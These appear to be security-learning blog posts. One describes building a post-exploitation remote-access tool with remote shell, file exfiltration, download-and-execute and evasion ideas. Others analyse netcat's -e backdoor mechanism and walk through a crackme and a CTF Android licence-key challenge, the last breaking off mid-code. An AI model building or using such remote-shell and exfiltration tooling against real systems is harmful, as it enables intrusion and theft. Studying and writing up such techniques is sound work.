In designing the actual protocol the client and server use to communicate, I decided to use HTTP to mildly obfuscate the client’s initial check if the server is running. The client’s ping consists of a GET request for /style.css on the server 1. Of course, the server isn’t a real web server, but it temporarily masquerades as one for the purposes of the initial handshake and sends back a hardcoded HTTP response of some random css file, and launches the control shell for the user. At this point, the protocol used is as simple as it gets: size of the following data + the data itself. This being my first time doing socket programming, my implementation was a little weird and reserved the first five bytes of the data sent over the wire for the ASCII decimal representation of the size (¯\_(ツ)_/¯), but hey, it worked.
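
To make the framing concrete, here is a minimal sketch of a “size, then data” message format with a five-byte ASCII decimal size. It isn’t Poet’s actual code: the names frame and unframe are made up for illustration, and zero-padding the size field is an assumption.

```python
PREFIX_LEN = 5  # bytes reserved for the ASCII decimal size


def frame(data):
    """Prefix data (bytes) with its length as five ASCII decimal digits."""
    if len(data) > 10 ** PREFIX_LEN - 1:
        raise ValueError('message too large for a %d-digit size' % PREFIX_LEN)
    # zero padding is an assumption made for this sketch
    return str(len(data)).zfill(PREFIX_LEN).encode('ascii') + data


def unframe(buf):
    """Split one framed message off the front of buf.

    Returns (message, remaining_bytes)."""
    size = int(buf[:PREFIX_LEN].decode('ascii'))
    end = PREFIX_LEN + size
    if len(buf) < end:
        raise ValueError('incomplete message')
    return buf[PREFIX_LEN:end], buf[end:]
```

One consequence of a format like this is that a single message can carry at most 99999 bytes.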

The majority of the work left for v0.2 was essentially deciding on the features that the control shell would have and implementing the “userland utilities” or commands you could run at the shell. The commands I thought of and implemented were:

  • exec: This was the first command I wrote. It executes one or more commands on the target, sending the stdout of all of them back in one big chunk of text. I later added a flag that would save the big chunk to a file in the archive directory. Useful for stuff like grabbing process dumps.
  • recon: Basically like exec, but the commands are pre-selected and are tailored towards “reconnaissance” purposes. Stuff like whoami, id, uname -a, w, etc.
  • shell: Launches an actual remote shell on the target (inside the original control shell). Was implemented really crudely in this version with the execution backend on the client simply being something like
sp.Popen(cmd, stdout=sp.PIPE, stderr=sp.STDOUT, shell=True).communicate()[0]
  • exfil: Exfiltrates files from the target and saves them to the archive directory. Pretty standard. The current implementation is pretty crude, and loads the entire file into memory rather than paging the data somehow.
  • selfdestruct: Exit the client and delete script on disk. Without this, the user would have to do something weird (nay, treasonous?) like killing the client’s process from its own remote shell to completely turn off the client.
  • dlexec: Download an executable from the internet and execute it. Also pretty standard, useful for upgrading or installing additional tools on the target.
  • exit: Pretty self explanatory, this tells the client that the server’s done for now and that the client can now go back to sleep and begin pinging again in one time interval.

This work resulted in a decently functional prototype that could feasibly be used for post-exploitation.

v0.3

Version 0.3 was a pretty arbitrary decision, but mostly involved significant refactoring of the backend code, with a couple new user facing features. One notable change was the refactoring of the entire codebase from imperative, C-style programming to object oriented style, which gave the code much better structure. The communications protocol was also slightly refactored to be more standard by reserving the first four bytes for the binary data size value which simultaneously conserved bytes sent over the wire and increased the maximum data that could be sent in one message between client and server. An additional shell command I implemented was called chint, standing for “change interval”, which lets the server change the client’s ping delay interval after the client’s been started.
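
As a rough illustration of a four-byte binary size header, here is a sketch using Python’s struct module. The function names are hypothetical, and the choice of an unsigned, big-endian (network order) integer is an assumption, since the byte order isn’t stated above.

```python
import struct

# 4-byte unsigned size in network byte order (the byte order is assumed)
HEADER = struct.Struct('!I')


def pack_msg(data):
    """Prefix data (bytes) with its length as a 4-byte binary integer."""
    return HEADER.pack(len(data)) + data


def unpack_msg(buf):
    """Split one message off the front of buf.

    Returns (message, remaining_bytes)."""
    (size,) = HEADER.unpack(buf[:HEADER.size])
    end = HEADER.size + size
    if len(buf) < end:
        raise ValueError('incomplete message')
    return buf[HEADER.size:end], buf[end:]
```

Four binary bytes can describe a message of up to 2^32 - 1 bytes, while five ASCII decimal digits top out at 99999.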

All that’s great, but the most significant set of improvements in my opinion were related to fleshing out the remote shell feature. While it “worked” to a decent degree for most standard commands there were two main problems with it that kept it from being a “real” shell. For reference, here’s what the code looked like for executing commands in v0.2.

def cmd_exec(cmd):
    return sp.Popen(cmd, stdout=sp.PIPE, stderr=sp.STDOUT,
                    shell=True).communicate()[0]

For those that aren’t as familiar with Python’s subprocess library, this executes an arbitrary command line (cmd), sending the stderr to the stdout, and returns any stdout of the command.

The first problem was that the shell output was not continuous – when executing a command like ls -R /, which typically results in lots of scrolling output in a normal terminal, my remote shell would instead block on the server end while the client executed the command to its completion and sent over the entire stdout as one big piece. I solved this problem by adapting the code to continuously poll the stdout file descriptor for new lines of output, sending those over individually so that the server would get each line of output as soon as it was available.

The second problem was that if certain commands like ping were executed in the shell, the client would effectively become unusable because ping (when executed without the -c parameter) is usually ended by being sent an INT signal (SIGINT), typically by hitting Ctrl-C on the keyboard. The problem is, the client side had no mechanism to receive signals and send them to the running process, so it would be eternally running this unending process and the user would totally lose control of the target. To solve this problem, I needed a way for the client to simultaneously execute the requested command, and listen for messages from the server, presumably telling the client to end the running process. To do this, I learned to use the select() function which is an easy way for an application to multiplex data streams (in this case, the stdout of the running process, and the socket connection to the server) and process their data without requiring concurrency at the application level.

The resulting code from these two fixes is below. Select takes in multiple file descriptors (File objects in Python) and returns which ones are readable (in this example). After it returns, I can check which file descriptors it returned, and proceed accordingly. In the expected case where we can read from the process’s stdout file descriptor, we get a line of stdout from the process, forwarding it to the server immediately. In the exceptional case where we can read from the socket, we receive the message, making sure it contains the proper keyword to end the process (‘shellterm’) and terminating the process if it does.

proc = sp.Popen(inp, stdout=sp.PIPE, stderr=sp.STDOUT, shell=True)
while True:
    readable = select.select([proc.stdout, s.s], [], [], 30)[0]
    for fd in readable:
        if fd == proc.stdout:  # proc has stdout/err to send
            output = proc.stdout.readline()
            if output:
                s.send(output)
            else:
                return
        elif fd == s.s:  # remote signal from server
            sig = s.recv()
            if sig == 'shellterm':
                proc.terminate()
                return
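
For anyone who wants to experiment with this pattern outside of Poet, here is a self-contained sketch of the same idea. It is not the project’s code: run_and_stream is a made-up name, a plain socket stands in for Poet’s connection wrapper, and the pipe is opened unbuffered (bufsize=0) so that select() and readline() agree on when data is available. It relies on select() working on pipes, so it is Unix-only.

```python
import select
import socket
import subprocess as sp


def run_and_stream(cmd, conn, timeout=30):
    """Run cmd, forwarding each line of its output to conn as it appears.

    Stops the process early if b'shellterm' arrives on conn (or conn closes).
    Returns 'finished' or 'terminated'."""
    proc = sp.Popen(cmd, stdout=sp.PIPE, stderr=sp.STDOUT, shell=True,
                    bufsize=0)
    try:
        while True:
            readable = select.select([proc.stdout, conn], [], [], timeout)[0]
            for src in readable:
                if src is proc.stdout:
                    line = proc.stdout.readline()
                    if not line:  # EOF: the process has finished
                        return 'finished'
                    conn.sendall(line)
                else:
                    msg = conn.recv(1024)
                    if not msg or msg == b'shellterm':
                        proc.terminate()
                        return 'terminated'
    finally:
        proc.stdout.close()
        proc.wait()


if __name__ == '__main__':
    # a local socket pair stands in for the client/server connection
    client_end, server_end = socket.socketpair()
    print(run_and_stream('echo hi', client_end))
    print(server_end.recv(1024))
```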

That’s all for v0.3. Again, the v0.3 decision was pretty arbitrary and I ultimately chose to ship it because all the other features I had lined up at the time were more labor intensive/experimental and I really wanted to get my fancy new remote shell into master :D.

Future Work

At this point, I’m pretty satisfied with the state of the project, but as always, there’s more work to be done. Here are some future features/ideas/improvements that may or may not ever get implemented:

  • crypto: If anything, I’d say encrypted communications are the one thing keeping this from being a really usable tool. Right now, communications are sent in the clear essentially, although they are base64 encoded for the slightest amount of obfuscation. Ideally I’d use Python’s ssl library, probably doing something like hardcoding a server public key into the client. A solution that wouldn’t be as much work, but only slightly more secure than the current cleartext communications would be to use a basic xor cipher which would be pretty easy to write, and force an analyst to retrieve the key from memory, or the initial exchange over the network, depending on how I chose to implement it.
  • protocol improvement: This shouldn’t actually be too hard to implement, but the data section of a poet message is typically some type of keyword, a space, then any relevant data. For example, to start a shell, the server sends over “shell”, to get recon data, the server sends “recon”, for an exec command, the server sends over “exec” followed by the commands to execute. Instead of using these string keywords, it would be possible to move them into the protocol as a single byte after the data size and have some sort of lookup table for referencing the appropriate action to each key.
  • interval fuzzing: Instead of having a strict, predictable delay time interval for client pings, I could implement some sort of fuzzing so that the delay time is slightly variable for further obfuscation purposes.

and last, but not least…

  • botnet(?!): Now that I more or less have the infrastructure down for controlling a single client, it would be pretty cool to fork the project and adapt it for a more distributed design with multiple clients connecting to the server, all receiving commands to execute.
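
As a small illustration of the interval fuzzing idea from the list above, the delay could be varied by a random fraction each time. This is only a sketch: next_delay and its jitter parameter are hypothetical names, and the 20% default is an arbitrary choice.

```python
import random


def next_delay(base, jitter=0.2, rng=random):
    """Return base seconds, randomly varied by up to +/- jitter (a fraction)."""
    if not 0 <= jitter < 1:
        raise ValueError('jitter must be in [0, 1)')
    return base * (1 + rng.uniform(-jitter, jitter))


if __name__ == '__main__':
    # with a 600 second base, delays land roughly between 480 and 720 seconds
    print([round(next_delay(600)) for _ in range(5)])
```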

Again, all the code for this project is available on github. Hopefully this was interesting/helpful for some people, and as always thanks for reading!


  1. Writing this post and thinking about this again actually helped me discover a bug in the server where the server would terminate if it happened to receive a non-client HTTP request while waiting for the client. This would enable a third party that wanted to mess with the Poet user to spam the Poet user’s machine with HTTP requests (assuming they knew the proper port to send to) at any interval smaller than the Poet interval, and effectively DOS Poet.

Netcat “-e” Analysis

As I mentioned in a previous post, netcat has this cool -e parameter that lets you specify an executable to essentially turn into a network service, that is, a process that can send and receive data over the network. This option is particularly useful when called with a shell (/bin/sh, /bin/bash, etc) as a parameter because this creates a poor man’s remote shell connection, and can also be used as a backdoor into the system. As part of the post-exploitation tool I’m working on, I wanted to try to add this type of remote shell feature, but it wasn’t immediately obvious to me how something like this would be done, so I decided to dive into netcat’s source and see if I could understand how it was implemented.

Not knowing where to start, I first tried searching the file for “-e” which brought me to:

case 'e':           /* prog to exec */
  if (opt_exec)
    ncprint(NCPRINT_ERROR | NCPRINT_EXIT,
            _("Cannot specify `-e' option double"));
  opt_exec = strdup(optarg);
  break;

This snippet is using the GNU argument parsing library, getopt, to handle the “-e” option. If opt_exec has already been set, “-e” was given twice and an error is reported; otherwise the global char* variable opt_exec is set to a copy of the parameter. Then I tried searching for opt_exec, bringing me to:

if (netcat_mode == NETCAT_LISTEN) {
  if (opt_exec) {
    ncprint(NCPRINT_VERB2, _("Passing control to the specified program"));
    ncexec(&listen_sock);       /* this won't return */
  }
  core_readwrite(&listen_sock, &stdio_sock);
  debug_dv(("Listen: EXIT"));
}

This code checks if opt_exec is set, and if so calls ncexec().

 1 /* Execute an external file making its stdin/stdout/stderr the actual socket */
 2 
 3 static void ncexec(nc_sock_t *ncsock)
 4 {
 5   int saved_stderr;
 6   char *p;
 7   assert(ncsock && (ncsock->fd >= 0));
 8 
 9   /* save the stderr fd because we may need it later */
10   saved_stderr = dup(STDERR_FILENO);
11 
12   /* duplicate the socket for the child program */
13   dup2(ncsock->fd, STDIN_FILENO);   /* the precise order of fiddlage */
14   close(ncsock->fd);            /* is apparently crucial; this is */
15   dup2(STDIN_FILENO, STDOUT_FILENO);    /* swiped directly out of "inetd". */
16   dup2(STDIN_FILENO, STDERR_FILENO);    /* also duplicate the stderr channel */
17 
18   /* change the label for the executed program */
19   if ((p = strrchr(opt_exec, '/')))
20     p++;            /* shorter argv[0] */
21   else
22     p = opt_exec;
23 
24   /* replace this process with the new one */
25 #ifndef USE_OLD_COMPAT
26   execl("/bin/sh", p, "-c", opt_exec, NULL);
27 #else
28   execl(opt_exec, p, NULL);
29 #endif
30   dup2(saved_stderr, STDERR_FILENO);
31   ncprint(NCPRINT_ERROR | NCPRINT_EXIT, _("Couldn't execute %s: %s"),
32       opt_exec, strerror(errno));
33 }               /* end of ncexec() */

Here, on lines 13-16, is how the “-e” parameter really works. dup2() accepts two file descriptors; after closing the second one if it is open (as if close() was called on it), it makes the second one refer to the same open file as the first. So on line 13, stdin is being set to the file descriptor for the network socket netcat opened. This means that the child process will treat any data received over the network as input and will act accordingly. Then on lines 15 and 16, the stdout and stderr descriptors are also set to the socket, which will cause any output the program has to be sent over the network. As far as line 14 goes, I’m not sure why the original socket file descriptor has to be closed at that exact point (and based on the comments, it seems like the netcat author wasn’t sure either).

The main point is this file descriptor swapping has essentially converted our specified program into a network service; all the input and output will be piped over the network, and at this point the child process can be executed. The child will replace the netcat process and will also inherit the newly set socket file descriptors. Note that on lines 30 and 31 there’s some error handling code that resets the original stderr for the netcat process and prints out an error message. This is because the code should actually never get to this point in execution due to the execl() call and if it does, there was an error executing the child.
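
The same descriptor shuffling can be tried out from Python. The sketch below is an approximation, not a port of netcat: exec_over_socket is a made-up name, and a local socket pair stands in for the network socket so nothing has to listen on a port. It uses os.fork(), so it is Unix-only.

```python
import os
import socket


def exec_over_socket(argv, request):
    """Run argv with a socket as its stdin/stdout/stderr, send it request,
    and return everything it writes back."""
    parent, child = socket.socketpair()
    pid = os.fork()
    if pid == 0:
        # Child: mirror the dup2() calls in ncexec().
        parent.close()
        try:
            os.dup2(child.fileno(), 0)  # stdin  now refers to the socket
            os.dup2(0, 1)               # stdout now refers to the socket
            os.dup2(0, 2)               # stderr now refers to the socket
            os.execvp(argv[0], argv)    # replaces this process on success
        finally:
            os._exit(127)               # only reached if the exec failed
    child.close()
    parent.sendall(request)
    parent.shutdown(socket.SHUT_WR)     # tell the child its input is finished
    chunks = []
    while True:
        data = parent.recv(4096)
        if not data:                    # child exited and closed its end
            break
        chunks.append(data)
    parent.close()
    os.waitpid(pid, 0)
    return b''.join(chunks)


if __name__ == '__main__':
    # cat simply echoes its stdin, so the request comes straight back
    print(exec_over_socket(['cat'], b'hello'))
```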

I wrote this little python program to see if I understood things correctly:

#!/usr/bin/env python

import sys

inp = sys.stdin.read(5)
if inp == 'hello':
    sys.stdout.write('hi\n')
else:
    sys.stdout.write('bye\n')

It simply reads 5 bytes from stdin and prints ‘hi’ if those 5 bytes were ‘hello’ otherwise printing ‘bye’.

Using this program as the -e parameter results in this:

$ netcat -e /tmp/test.py -lp 8080 &
[1] 19021
$ echo asdfg | netcat 127.0.0.1 8080
bye
[1]+  Done                    netcat -e /tmp/test.py -lp 8080
$ netcat -e /tmp/test.py -lp 8080 &
[1] 19024
$ echo hello | netcat 127.0.0.1 8080
hi
[1]+  Done                    netcat -e /tmp/test.py -lp 8080

We can see the “server” launched in the background. The echo command sends data into netcat’s stdin, which is being sent over the network, handled by the python script, which sends back its response, which gets printed. Then we can see that the server exits since the netcat process has been replaced by the script, and the script has exited.

Beginner Crackme

As part of an Intro to Security course I’m taking, my professor gave us a crackme style exercise to practice reading x86 assembly and basic reverse engineering.

The program is pretty simple. It accepts a password as an argument and we’re told that if the password is correct, “ok” is printed.

$ ./crackme
usage: ./crackme <secret>
$ ./crackme test
$

As usual, I start by running file on the binary, which shows that it’s a standard x64 ELF binary. file also says that the binary is “not stripped”, which means that it includes symbols. All I really know about symbols is that they can include debugging information about a binary, like function and variable names, and that some symbols aren’t really necessary; they can be stripped out to reduce the binary’s size and make reverse engineering more challenging. Maybe I’ll do a more in depth post on this in the future.

$ file crackme
crackme: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, BuildID[sha1]=0x3fcf895b7865cb6be6b934640d1519a1e6bd6d39, not stripped

Next, I run strings, hoping to get lucky and find the password among the strings in the binary. strings prints runs of printable characters (at least four long by default) found in the file, but unfortunately nothing here works as the password.

$ strings crackme
/lib64/ld-linux-x86-64.so.2
exd4
libc.so.6
puts
printf
memcmp
__libc_start_main
__gmon_start__
GLIBC_2.2.5
fffff.
AWAVA
AUATL
[]A\A]A^A_
usage: %s <secret>
;*3$"

Since that didn’t work, we’re forced to disassemble the binary and actually try to reverse engineer it. We’ll start with main.

$ gdb -batch -ex 'file crackme' -ex 'disas main'
Dump of assembler code for function main:
   0x00000000004004a0 <+0>:     sub    rsp,0x8
   0x00000000004004a4 <+4>:     cmp    edi,0x1
   0x00000000004004a7 <+7>:     jle    0x4004c7 <main+39>
   0x00000000004004a9 <+9>:     mov    rdi,QWORD PTR [rsi+0x8]
   0x00000000004004ad <+13>:    call   0x4005e0 <verify_secret>
   0x00000000004004b2 <+18>:    test   eax,eax
   0x00000000004004b4 <+20>:    je     0x4004c2 <main+34>
   0x00000000004004b6 <+22>:    mov    edi,0x4006e8
   0x00000000004004bb <+27>:    call   0x400450 <puts@plt>
   0x00000000004004c0 <+32>:    xor    eax,eax
   0x00000000004004c2 <+34>:    add    rsp,0x8
   0x00000000004004c6 <+38>:    ret
   0x00000000004004c7 <+39>:    mov    rsi,QWORD PTR [rsi]
   0x00000000004004ca <+42>:    mov    edi,0x4006d4
   0x00000000004004cf <+47>:    xor    eax,eax
   0x00000000004004d1 <+49>:    call   0x400460 <printf@plt>
   0x00000000004004d6 <+54>:    mov    eax,0x1
   0x00000000004004db <+59>:    jmp    0x4004c2 <main+34>
End of assembler dump.

Let’s break this down a little.

0x00000000004004a0 <+0>:     sub    rsp,0x8
0x00000000004004a4 <+4>:     cmp    edi,0x1
0x00000000004004a7 <+7>:     jle    0x4004c7 <main+39>

Starting at the beginning, we see the stack pointer decremented as part of the function prologue. A traditional prologue saves the old frame’s base pointer on the stack, sets the base pointer to the current stack pointer, then subtracts from the stack pointer to make room on the stack for local variables, etc. We don’t see the first two steps here, most likely because the binary was compiled with optimizations that omit the frame pointer (main does have a caller, __libc_start_main, so it isn’t special in that respect). The sub rsp,0x8 that remains keeps the stack 16-byte aligned for the calls that follow.

Then the edi register is compared to 1 and if it is less than or equal, we jump to offset 39.

   0x00000000004004c2 <+34>:    add    rsp,0x8
   0x00000000004004c6 <+38>:    ret
   0x00000000004004c7 <+39>:    mov    rsi,QWORD PTR [rsi]
   0x00000000004004ca <+42>:    mov    edi,0x4006d4
   0x00000000004004cf <+47>:    xor    eax,eax
   0x00000000004004d1 <+49>:    call   0x400460 <printf@plt>
   0x00000000004004d6 <+54>:    mov    eax,0x1
   0x00000000004004db <+59>:    jmp    0x4004c2 <main+34>

Here at offset 39, we print something then jump to offset 34 where we repair the stack (undo the sub instruction from the prologue) and return (ending execution).

This is likely how the program checks the arguments and prints the usage message if no arguments are supplied (which would cause argc/edi to be 1).

However if we supply an argument, edi is 0x2 and we move past the jle instruction.

   0x00000000004004a9 <+9>:     mov    rdi,QWORD PTR [rsi+0x8]
   0x00000000004004ad <+13>:    call   0x4005e0 <verify_secret>

Here we can see the verify_secret function being called with a parameter in rdi. This is most likely the argument we passed into the program. We can confirm this with gdb (I’m using it with peda here).

gdb-peda$ tele $rsi
0000| 0x7fffffffeb48 --> 0x7fffffffed6e ("/home/vagrant/crackme/crackme")
0008| 0x7fffffffeb50 --> 0x7fffffffed8c --> 0x4548530074736574 ('test')
0016| 0x7fffffffeb58 --> 0x0

Indeed rsi points to the first element of argv, so incrementing that by 8 bytes (because 64 bit) points to argv[1], which is our input.

If we look after the verify_secret call we can see the program checks if eax is 0 and if it is, jumps to offset 34, ending the program. However, if eax is not zero, we’ll hit a puts call before exiting, which will presumably print out the “ok” message we want.

   0x00000000004004b2 <+18>:    test   eax,eax
   0x00000000004004b4 <+20>:    je     0x4004c2 <main+34>
   0x00000000004004b6 <+22>:    mov    edi,0x4006e8
   0x00000000004004bb <+27>:    call   0x400450 <puts@plt>
   0x00000000004004c0 <+32>:    xor    eax,eax
   0x00000000004004c2 <+34>:    add    rsp,0x8
   0x00000000004004c6 <+38>:    ret

Now let’s disassemble verify_secret to see how the input validation is performed, and to see how we can make it return non-zero.

Dump of assembler code for function verify_secret:
   0x00000000004005e0 <+0>:     sub    rsp,0x408
   0x00000000004005e7 <+7>:     movzx  eax,BYTE PTR [rdi]
   0x00000000004005ea <+10>:    mov    rcx,rsp
   0x00000000004005ed <+13>:    test   al,al
   0x00000000004005ef <+15>:    je     0x400622 <verify_secret+66>
   0x00000000004005f1 <+17>:    mov    rdx,rsp
   0x00000000004005f4 <+20>:    jmp    0x400604 <verify_secret+36>
   0x00000000004005f6 <+22>:    nop    WORD PTR cs:[rax+rax*1+0x0]
   0x0000000000400600 <+32>:    test   al,al
   0x0000000000400602 <+34>:    je     0x400622 <verify_secret+66>
   0x0000000000400604 <+36>:    xor    eax,0xfffffff7
   0x0000000000400607 <+39>:    lea    rsi,[rsp+0x400]
   0x000000000040060f <+47>:    add    rdx,0x1
   0x0000000000400613 <+51>:    mov    BYTE PTR [rdx-0x1],al
   0x0000000000400616 <+54>:    add    rdi,0x1
   0x000000000040061a <+58>:    movzx  eax,BYTE PTR [rdi]
   0x000000000040061d <+61>:    cmp    rdx,rsi
   0x0000000000400620 <+64>:    jb     0x400600 <verify_secret+32>
   0x0000000000400622 <+66>:    mov    edx,0x18
   0x0000000000400627 <+71>:    mov    esi,0x600a80
   0x000000000040062c <+76>:    mov    rdi,rcx
   0x000000000040062f <+79>:    call   0x400480 <memcmp@plt>
   0x0000000000400634 <+84>:    test   eax,eax
   0x0000000000400636 <+86>:    sete   al
   0x0000000000400639 <+89>:    add    rsp,0x408
   0x0000000000400640 <+96>:    movzx  eax,al
   0x0000000000400643 <+99>:    ret
End of assembler dump.

I won’t walk through this one in detail because understanding each line isn’t necessary to crack this. Let’s skip to the memcmp call. If memcmp returns 0, eax is set to 1 and the function returns. This is exactly what we want. From the man page, memcmp takes three parameters, two buffers to compare and the number of bytes to compare, and returns 0 if those bytes are identical.

   0x0000000000400622 <+66>:    mov    edx,0x18
   0x0000000000400627 <+71>:    mov    esi,0x600a80
   0x000000000040062c <+76>:    mov    rdi,rcx
   0x000000000040062f <+79>:    call   0x400480 <memcmp@plt>

Here’s the setup to the memcmp call. We can see the third parameter for length is the immediate 0x18 meaning the buffers will be 24 bytes in length. If we examine address 0x600a80, we find this 24 byte string:

gdb-peda$ hexd 0x600a80 /2
0x00600a80 : 91 bf a4 85 85 c3 ba b9 9f a6 b6 b1 93 b9 83 8f   ................
0x00600a90 : ae b1 ae c1 bc 80 ca ca 00 00 00 00 00 00 00 00   ................

Since this is a direct address to some memory, we can be fairly certain that we’ve found some sort of secret value! Based on the movzx eax,BYTE PTR [rdi] instruction (offset 7) which moves a byte from the input string into eax, the xor eax, 0xfffffff7 instruction (offset 36), and the add rdi, 0x1 instruction (offset 54) which increments the char* pointer to our input string, we can reasonably guess that this function is xor’ing each character of our input with 0xf7 and writing the result into a buffer which begins at rsp (also pointed to by rcx). Since we now know the secret (\x91\xbf\xa4\x85...) and the xor key (0xf7) it’s pretty easy to extract the password we need by xor’ing each byte of the secret with the xor key.

Here’s a way to do this with python.

# the 24 bytes found at 0x600a80
secret = b'\x91\xbf\xa4\x85\x85\xc3\xba\xb9\x9f\xa6\xb6\xb1\x93\xb9\x83\x8f\xae\xb1\xae\xc1\xbc\x80\xca\xca'
ba = bytearray(secret)
for i in range(len(ba)):
    ba[i] ^= 0xf7  # undo the xor applied by verify_secret
print(ba.decode('ascii'))

Which results in this:

$ python crack.py
fHSrr4MNhQAFdNtxYFY6Kw==
$ ./crackme fHSrr4MNhQAFdNtxYFY6Kw==
ok
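
As a sanity check on the reading of verify_secret above, here is a rough Python model of what the function appears to do. It is a guess reconstructed from the disassembly, not the original source: the constant names are made up, and the buffer is zero-filled here even though the real stack buffer is uninitialized.

```python
SECRET = bytearray(b'\x91\xbf\xa4\x85\x85\xc3\xba\xb9\x9f\xa6\xb6\xb1'
                   b'\x93\xb9\x83\x8f\xae\xb1\xae\xc1\xbc\x80\xca\xca')
KEY = 0xf7
BUF_SIZE = 0x400  # the copy loop stops once rdx reaches rsp+0x400


def verify_secret(candidate):
    """Model: xor each input byte with KEY, then compare the first 24 bytes."""
    buf = bytearray(BUF_SIZE)  # zero-filled in this model only
    data = bytearray(candidate)[:BUF_SIZE]
    for i, byte in enumerate(data):
        buf[i] = byte ^ KEY
    # corresponds to memcmp(buf, 0x600a80, 0x18) == 0
    return buf[:len(SECRET)] == SECRET


if __name__ == '__main__':
    print(verify_secret(b'fHSrr4MNhQAFdNtxYFY6Kw=='))
    print(verify_secret(b'test'))
```

If this model is right, only the first 24 bytes of the argument matter, so a longer argument that begins with the password should also be accepted.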

SU-CTF 2014 - “Commerical Application!”

This weekend I decided to try playing SU-CTF. I’m pretty bad at CTF to be honest, so I was pretty thrilled to get one of the 200 point challenges in the third (of five) difficulty tiers.

“Commerical Application!”

For this challenge, we’re given an Android application and the hint:

Flag is a serial number.

I installed it on my phone, here’s what it looks like:

I can tap on “Picture-01” and sliding to the right reveals this picture, but if I try to tap on “Picture-02” or “Pictures-03” the app says I need to enter a registration key. If I tap on the gear in the top right, I’m prompted to enter my product key.

Running file reveals that .apk files are apparently just Zip archives, so let’s try simply unzipping it.

$ file suCTF.apk
suCTF.apk: Zip archive data, at least v2.0 to extract
$ unzip suCTF.apk
Archive:  suCTF.apk
  inflating: assets/db.db
  inflating: res/color/abs__primary_text_disable_only_holo_dark.xml
  inflating: res/color/abs__primary_text_disable_only_holo_light.xml
  ...
  inflating: classes.dex
  inflating: META-INF/MANIFEST.MF
  inflating: META-INF/CERT.SF
  inflating: META-INF/CERT.RSA

Cool! Now we have all the miscellaneous files that comprise the app. There’s a database file, various .xml design files, and most interestingly, a classes.dex file. .dex files contain bytecode run on the Android Dalvik VM, which is currently the Java runtime for Android devices, so classes.dex likely contains the code that runs the app, in compiled form. We can use the nifty d2j-dex2jar utility to convert it into a classes-dex2jar.jar file. .jar files are apparently also Zip archives, and we can again unzip it to extract its contents.

$ file classes.dex
classes.dex: Dalvik dex file version 035
$ d2j-dex2jar classes.dex
dex2jar classes.dex -> classes-dex2jar.jar
$ unzip classes-dex2jar.jar
  ...
  inflating: edu/sharif/ctf/BuildConfig.class
  inflating: edu/sharif/ctf/CTFApplication.class
  inflating: edu/sharif/ctf/R$attr.class
  inflating: edu/sharif/ctf/R$bool.class
  inflating: edu/sharif/ctf/R$color.class
  inflating: edu/sharif/ctf/R$dimen.class
  inflating: edu/sharif/ctf/R$drawable.class
  inflating: edu/sharif/ctf/R$id.class
  inflating: edu/sharif/ctf/R$integer.class
  inflating: edu/sharif/ctf/R$layout.class
  inflating: edu/sharif/ctf/R$menu.class
  inflating: edu/sharif/ctf/R$string.class
  inflating: edu/sharif/ctf/R$style.class
  inflating: edu/sharif/ctf/R$styleable.class
  inflating: edu/sharif/ctf/R.class
  inflating: edu/sharif/ctf/activities/MainActivity$4.class
  inflating: edu/sharif/ctf/activities/MainActivity$5.class
  inflating: edu/sharif/ctf/activities/MainActivity$6.class
  inflating: edu/sharif/ctf/config/AppConfig.class
  inflating: edu/sharif/ctf/db/DBHelper.class
  inflating: edu/sharif/ctf/fragments/DListFragment$1.class
  inflating: edu/sharif/ctf/fragments/ListFragment$1.class
  inflating: edu/sharif/ctf/fragments/ListFragment$OnPictureSelectedListener.class
  inflating: edu/sharif/ctf/security/KeyVerifier.class
  ...

This produces a TON of various .class files, but the most interesting lie in the edu/sharif/ctf/ directory and are the compiled versions of the actual code that makes up this app. We can use the jad tool to decompile these back into Java source and start trying to reverse the product key.

There’s a directory in the app source called security/ that contains a file called KeyVerifier.class, which seems pretty promising. After decompiling it, we find a KeyVerifier class with some pretty cool functions.

public static boolean isValidLicenceKey(String s, String s1, String s2)
{
    boolean flag;
    if(encrypt(s, s1, s2).equals("29a002d9340fc4bd54492f327269f3e051619b889dc8da723e135ce486965d84"))
        flag = true;
    else
        flag = false;
    return flag;
}

public static String encrypt(String s, String s1, String s2)
{
    String s3 = "";
    String s4;
    SecretKeySpec secretkeyspec = new SecretKeySpec(hexStringToBytes(s1), "AES");
    Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
    cipher.init(1, secretkeyspec, new IvParameterSpec(s2.getBytes()));
    s4 = bytesToHexString(cipher.doFinal(s.getBytes()));
    s3 = s4;
_L2:
    return s3;
    Exception exception;
    exception;
    exception.printStackTrace();
    if(true) goto _L2; else goto _L1
_L1:
}

It’s pretty clear that isValidLicenceKey() is what processes the product key prompt in the app. The encrypt() function shows us that the first parameter s is the cleartext to be encrypted, the second parameter s1 is the AES encryption key, and the last parameter s2 is the AES initialization vector. After doing a bit of grepping, I confirmed this by decompiling activities/MainActivity.class and finding this code snippet:

public void onClick(DialogInterface dialoginterface, int i)
{
    if(KeyVerifier.isValidLicenceKey(userInput.getText().toString(), app.getDataHelper().getConfig().getSecurityKey(), app.getDataHelper().getConfig().getSecurityIv()))
    {
        app.getDataHelper().updateLicence(2014);
        MainActivity.isRegisterd = true;
        showAlertDialog(context, "Thank you, Your application has full licence. Enjoy it...!");
    } else
    {
        showAlertDialog(context, "Your licence key is incorrect...! Please try again with another.");
    }
}

With this in mind, the code seems to AES encrypt the user input and check if it matches a certain output. If we had the AES key and IV, we could decrypt the given output and find the plaintext product key.

Tracing through the calls for the second and third parameters passed into isValidLicenceKey(), I found that the AES key and IV were stored in the assets/db.db SQLite database I noticed earlier.

$ sqlite3 assets/db.db
 ...
 sqlite> select * from config;
 a           b           c           d           e                 f                                 g           h               i
 ----------  ----------  ----------  ----------  ----------------  --------------------------------  ----------  --------------  ----------
 1           2           2014        0           a5efdbd57b84ca36  37eaae0141f1a3adf8a1dee655853714  1000        ctf.sharif.edu  9

There are no headers to the columns, but it is pretty obvious that the key is the longer and the IV is the shorter of the “interesting strings” in the database. For further confidence, I can verify this from the decompiled code in db/DBHelper.class.

public AppConfig getConfig()
{
    boolean flag = true;
    AppConfig appconfig = new AppConfig();
    Cursor cursor = myDataBase.rawQuery(SELECT_QUERY, null);
    if(cursor.moveToFirst())
    {
        appconfig.setId(cursor.getInt(0));
        appconfig.setName(cursor.getString(flag));
        appconfig.setInstallDate(cursor.getString(2));
        if(cursor.getInt(3) <= 0)
            flag = false;
        appconfig.setValidLicence(flag);
        appconfig.setSecurityIv(cursor.getString(4));
        appconfig.setSecurityKey(cursor.getString(5));
        appconfig.setDesc(cursor.getString(7));
    }
